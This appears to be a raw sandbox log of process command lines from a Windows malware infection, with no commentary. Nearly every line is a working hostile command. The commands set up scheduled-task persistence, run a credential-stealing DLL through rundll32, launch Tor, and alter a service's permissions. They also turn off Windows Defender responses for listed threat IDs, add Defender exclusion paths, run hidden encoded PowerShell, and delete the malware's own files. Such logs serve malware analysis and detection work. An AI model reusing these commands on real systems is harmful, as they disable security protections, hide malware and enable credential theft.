C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 616 -p 2476 -ip 2476
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2476 -s 872
C:\Windows\explorer.exe
C:\Windows\explorer.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAANAAwAA==
C:\Users\Admin\AppData\Local\Temp\4A1B.exe
C:\Users\Admin\AppData\Local\Temp\4A1B.exe
C:\Users\Admin\AppData\Local\Temp\4A1B.exe
C:\Users\Admin\AppData\Local\Temp\4A1B.exe
C:\Windows\SYSTEM32\schtasks.exe
schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
C:\Users\Admin\AppData\Local\Temp\4A1B.exe
"C:\Users\Admin\AppData\Local\Temp\4A1B.exe" --Admin IsNotAutoStart IsNotTask
C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "gHbFtyKwQ"
C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\110809d565579c\cred.dll, Main
C:\Users\Admin\AppData\Local\Temp\csrss\tor\Tor\tor.exe
"C:\Users\Admin\AppData\Local\Temp\csrss\tor\Tor\tor.exe" --nt-service -f "C:\Users\Admin\AppData\Local\Temp\csrss\tor\torrc" --Log "notice file C:\Users\Admin\AppData\Local\Temp\csrss\tor\log.txt"
C:\Users\Admin\AppData\Local\Temp\4A1B.exe
"C:\Users\Admin\AppData\Local\Temp\4A1B.exe" --Admin IsNotAutoStart IsNotTask
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "bamNpdvhtkzLwlCraC" /SC once /ST 13:05:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\XPKruKcwkyRJuFApW\EdLqPAaTytMGRMX\SVjvbHJ.exe\" bH /site_id 525403 /S" /V1 /F
C:\Windows\SysWOW64\cmd.exe
cmd.exe /C sc sdset WmiPrvSE D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
C:\Windows\SysWOW64\sc.exe
sc sdset WmiPrvSE D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
C:\Users\Admin\AppData\Local\Temp\jwzeqsilllyafcnn.exe
"C:\Users\Admin\AppData\Local\Temp\jwzeqsilllyafcnn.exe"
C:\Users\Admin\AppData\Local\Temp\6DF1.exe
C:\Users\Admin\AppData\Local\Temp\6DF1.exe
C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\system32\schtasks.exe" /create /tn COMSurrogate /f /sc onlogon /rl highest /tr "C:\Users\Admin\AppVerif\DllHelper.exe"
C:\Users\Admin\AppVerif\DllHelper.exe
"C:\Users\Admin\AppVerif\DllHelper.exe"
C:\Users\Admin\AppData\Local\Temp\62eca45584\bguuwe.exe
C:\Users\Admin\AppData\Local\Temp\62eca45584\bguuwe.exe
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c chcp 65001 && ping 127.0.0.1 && DEL /F /S /Q /A "C:\Users\Admin\Pictures\Adobe Films\HNYUwmuil6MtmEKe7lmDsMC3.exe"
C:\Users\Admin\AppData\Local\09dfb731-f846-4759-8506-2a169e20e63b\build2.exe
"C:\Users\Admin\AppData\Local\09dfb731-f846-4759-8506-2a169e20e63b\build2.exe"
C:\Users\Admin\AppData\Local\Temp\7BCD.exe
C:\Users\Admin\AppData\Local\Temp\7BCD.exe
C:\Users\Admin\AppData\Local\Temp\nijiccssjnaevyew.exe
"C:\Users\Admin\AppData\Local\Temp\nijiccssjnaevyew.exe"
C:\Users\Admin\AppData\Local\Temp\IHH9FGG6KIID6CG.exe
C:\Windows\SysWOW64\chcp.com
chcp 65001
C:\Users\Admin\AppData\Local\Temp\8AF1.exe
C:\Users\Admin\AppData\Local\Temp\8AF1.exe
C:\Users\Admin\AppData\Local\09dfb731-f846-4759-8506-2a169e20e63b\build2.exe
"C:\Users\Admin\AppData\Local\09dfb731-f846-4759-8506-2a169e20e63b\build2.exe"
C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.1
C:\Users\Admin\AppData\Local\Temp\987E.exe
C:\Users\Admin\AppData\Local\Temp\987E.exe
C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 628 -p 2448 -ip 2448
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2448 -s 872
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 660 -p 4404 -ip 4404
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4404 -s 340
C:\Windows\explorer.exe
C:\Windows\explorer.exe
C:\Users\Admin\AppData\Local\Temp\CE07.exe
C:\Users\Admin\AppData\Local\Temp\CE07.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
C:\Users\Admin\AppData\Local\Microsoft\WindowsApps\Get-Variable.exe
"C:\Users\Admin\AppData\Local\Microsoft\WindowsApps\Get-Variable.exe"
C:\Windows\SysWOW64\schtasks.exe
/create /tn COMSurrogate /st 00:00 /du 9999:59 /sc once /ri 1 /f /tr "powershell.exe -windowstyle hidden"
C:\Users\Admin\AppData\Local\Temp\3A8A.exe
C:\Users\Admin\AppData\Local\Temp\3A8A.exe
C:\Users\Admin\AppData\Local\Temp\EF2C.exe
C:\Users\Admin\AppData\Local\Temp\EF2C.exe
C:\Users\Admin\AppData\Local\Temp\EF2C.exe
C:\Users\Admin\AppData\Local\Temp\EF2C.exe
C:\Users\Admin\AppData\Local\Temp\F576.exe
C:\Users\Admin\AppData\Local\Temp\F576.exe
C:\Windows\SysWOW64\tasklist.exe
tasklist /FI "imagename eq PSUAService.exe"
C:\Windows\SysWOW64\find.exe
find /I /N "psuaservice.exe"
C:\Users\Admin\AppData\Local\Temp\F7E8.exe
C:\Users\Admin\AppData\Local\Temp\F7E8.exe
C:\Users\Admin\AppData\Local\Temp\FB35.exe
C:\Users\Admin\AppData\Local\Temp\FB35.exe
C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
C:\Windows\explorer.exe
C:\Windows\explorer.exe
C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
C:\Users\Admin\AppData\Roaming\Smart Clock\SmartClock.exe
"C:\Users\Admin\AppData\Roaming\Smart Clock\SmartClock.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 688 -p 24408 -ip 24408
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 24408 -s 1132
C:\Windows\explorer.exe
C:\Windows\explorer.exe
C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\findstr.exe
findstr /V /R "^DPPUlpMDoxxhVrUIPtlDSFKoNmARJTULbxHxsooLczeCBvhhRbTNaFvXtGiKJUTgAJQAcAsHWmomCiGsjjZjquaSYKfKqbwAmNeS$" Strette.htm
C:\Windows\explorer.exe
C:\Windows\explorer.exe
C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\Tal.exe.pif
Tal.exe.pif H
C:\Windows\SysWOW64\PING.EXE
ping localhost -n 5
C:\Windows\SysWOW64\tasklist.exe
tasklist /FI "imagename eq PSUAService.exe"
C:\Windows\SysWOW64\find.exe
find /I /N "psuaservice.exe"
C:\Windows\SysWOW64\findstr.exe
findstr /V /R "^DPPUlpMDoxxhVrUIPtlDSFKoNmARJTULbxHxsooLczeCBvhhRbTNaFvXtGiKJUTgAJQAcAsHWmomCiGsjjZjquaSYKfKqbwAmNeS$" Strette.htm
C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\Tal.exe.pif
Tal.exe.pif H
C:\Windows\SysWOW64\PING.EXE
ping localhost -n 5
C:\Windows\SysWOW64\PING.EXE
ping -n 5 localhost
C:\Windows\SysWOW64\PING.EXE
ping -n 5 localhost
C:\Users\Admin\AppData\Local\Temp\XPKruKcwkyRJuFApW\EdLqPAaTytMGRMX\SVjvbHJ.exe
C:\Users\Admin\AppData\Local\Temp\XPKruKcwkyRJuFApW\EdLqPAaTytMGRMX\SVjvbHJ.exe bH /site_id 525403 /S
C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -windowstyle hidden
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:64
C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\Tal.exe.pif
C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\Tal.exe.pif
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:64
C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\Tal.exe.pif
C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\Tal.exe.pif
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:64
C:\Users\Admin\AppData\Local\Temp\signed.exe
"C:\Users\Admin\AppData\Local\Temp\signed.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\QwrkXrSOGBVCC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\QwrkXrSOGBVCC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\iNyCImZcmuwfbRRHWCR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\iNyCImZcmuwfbRRHWCR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\qtzXYlPxPmUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\qtzXYlPxPmUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\uyPuAlXAcIBU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\uyPuAlXAcIBU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\wKAtYsCOU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\wKAtYsCOU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\OsVMcSWGRXGXAxVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\OsVMcSWGRXGXAxVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\XPKruKcwkyRJuFApW\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\XPKruKcwkyRJuFApW\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\IIxDORIMmvvtwMVt\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\IIxDORIMmvvtwMVt\" /t REG_DWORD /d 0 /reg:64;"
C:\Users\Admin\AppData\Local\Temp\csrss\f801950a962ddba14caaa44bf084b55c.exe
C:\Users\Admin\AppData\Local\Temp\csrss\f801950a962ddba14caaa44bf084b55c.exe
C:\ProgramData\MsDrvSrvc.exe
"C:\ProgramData\MsDrvSrvc.exe"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\QwrkXrSOGBVCC" /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\QwrkXrSOGBVCC" /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\QwrkXrSOGBVCC" /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\iNyCImZcmuwfbRRHWCR" /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\iNyCImZcmuwfbRRHWCR" /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\qtzXYlPxPmUn" /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\qtzXYlPxPmUn" /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\uyPuAlXAcIBU2" /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\uyPuAlXAcIBU2" /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\wKAtYsCOU" /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\wKAtYsCOU" /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\OsVMcSWGRXGXAxVB /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\OsVMcSWGRXGXAxVB /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\XPKruKcwkyRJuFApW /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\XPKruKcwkyRJuFApW /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\IIxDORIMmvvtwMVt /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\IIxDORIMmvvtwMVt /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "gnPdzlYCb" /SC once /ST 08:48:55 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
C:\Windows\SysWOW64\schtasks.exe
schtasks /run /I /tn "gnPdzlYCb"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 680 -p 804 -ip 804
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 804 -s 484
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 664 -p 1164 -ip 1164
C:\Windows\SysWOW64\WerFault.exe
